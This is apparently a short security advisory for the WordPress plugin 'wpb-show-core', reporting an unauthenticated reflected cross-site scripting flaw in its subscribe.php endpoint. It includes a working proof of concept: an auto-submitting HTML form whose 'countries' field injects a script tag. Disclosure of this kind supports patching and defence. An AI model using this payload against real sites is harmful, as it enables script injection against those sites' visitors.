Description The plugin does not sanitise and escape the parameters before outputting it back in the response of an unauthenticated request, leading to a Reflected Cross-Site Scripting
Open an HTML file containing the following:
```
<html>
<body>
<form action="https://example.com/wp-content/plugins/wpb-show-core/auto-suggest-categories/subscribe.php" id="hack" method="POST">
<input type="hidden" name="firstname" value="test" />
<input type="hidden" name="lastname" value="test2" />
<input type="hidden" name="countries" value='xxxxxx"><script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
```